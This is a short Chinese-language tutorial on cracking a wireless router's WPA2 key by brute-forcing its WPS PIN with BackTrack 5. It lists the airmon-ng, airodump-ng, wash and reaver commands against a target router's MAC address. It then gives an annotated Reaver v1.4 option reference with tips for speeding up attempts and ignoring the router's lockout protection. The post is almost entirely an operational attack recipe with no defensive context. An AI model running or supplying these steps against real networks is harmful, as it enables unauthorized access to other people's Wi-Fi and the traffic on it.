BackTrack5利用路由PIN码破解无线路由WPA2密钥

  
  
  
  
  1. airmon-ng start wlan0 //将无线网卡设置为监控模式 
  2. airodump-ng -i mon0   //获得周围无线路由信息 
  3. wash -i mon0 -C       //查看支持PIN码破解的无线路由 
  4. reaver -i mon0 -b 路由MAC地址 -S -a -p 路由PIN码 -vv //开始PIN破解

 

Reaver v1.4的参数说明

  -i, --interface=<wlan>  Name of the monitor-mode interface to use

                          网卡的监视接口,通常是mon0

  -b, --bssid=<mac>       BSSID of the target AP

                          AP的MAC地址

Optional Arguments:

  -m, --mac=<mac>         MAC of the host system

                          指定本机MAC地址,在AP有MAC过滤的时候需要使用

  -e, --essid=<ssid>      ESSID of the target AP

                          路由器的ESSID,一般不用指定

  -c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)

                          信号的频道,如果不指定会自动扫描

  -o, --out-file=<file>   Send output to a log file [stdout]

                          标准输出到文件

  -s, --session=<file>    Restore a previous session file

                          恢复进程文件

  -C, --exec=<command>    Execute the supplied command upon successful pin recovery

                          pin成功后执行命令

  -D, --daemonize         Daemonize reaver

                          设置reaver成Daemon

  -a, --auto              Auto detect the best advanced options for the target AP

                          对目标AP自动检测高级参数

  -f, --fixed             Disable channel hopping

                          禁止频道跳转

  -5, --5ghz              Use 5GHz 802.11 channels

                          使用5G频道

  -v, --verbose           Display non-critical warnings (-vv for more)

                          显示不重要警告信息 -vv 可以显示更多

  -q, --quiet             Only display critical messages

                          只显示关键信息

  -h, --help              Show help

                          显示帮助

Advanced Options:

  -p, --pin=<wps pin>          Use the specified 4 or 8 digit WPS pin

                               直接读取psk

  -d, --delay=<seconds>        Set the delay between pin attempts [1]

                               pin间延时,默认1秒,推荐设0

  -l, --lock-delay=<seconds>   Set the time to wait if the AP locks WPS pin attempts [60]

                               AP锁定WPS后等待时间

  -g, --max-attempts=<num>     Quit after num pin attempts

                               最大pin次数

  -x, --fail-wait=<seconds>    Set the time to sleep after 10 unexpected failures [0]

                               10次意外失败后等待时间,默认0秒

  -r, --recurring-delay=<x:y>  Sleep for y seconds every x pin attempts

                               每x次pin后等待y秒

  -t, --timeout=<seconds>      Set the receive timeout period [5]

                               收包超时,默认5秒

  -T, --m57-timeout=<seconds>  Set the M5/M7 timeout period [0.20]

                               M5/M7超时,默认0.2秒

  -A, --no-associate           Do not associate with the AP (association must be done by another application)

                               不连入AP(连入过程必须有其他程序完成)

  -N, --no-nacks               Do not send NACK messages when out of order packets are received

                               不发送NACK信息(如果一直pin不动,可以尝试这个参数)

  -S, --dh-small               Use small DH keys to improve crack speed

                               使用小DH关键值提高速度(推荐使用)

  -L, --ignore-locks           Ignore locked state reported by the target AP

                               忽略目标AP报告的锁定状态

  -E, --eap-terminate          Terminate each WPS session with an EAP FAIL packet

                               每当收到EAP失败包就终止WPS进程

  -n, --nack                   Target AP always sends a NACK [Auto]

                               对目标AP总是发送NACK,默认自动

  -w, --win7                   Mimic a Windows 7 registrar [False]

                               模拟win7注册,默认关闭

 

你可能感兴趣的:(PIN,破解无线路由WPA2密码)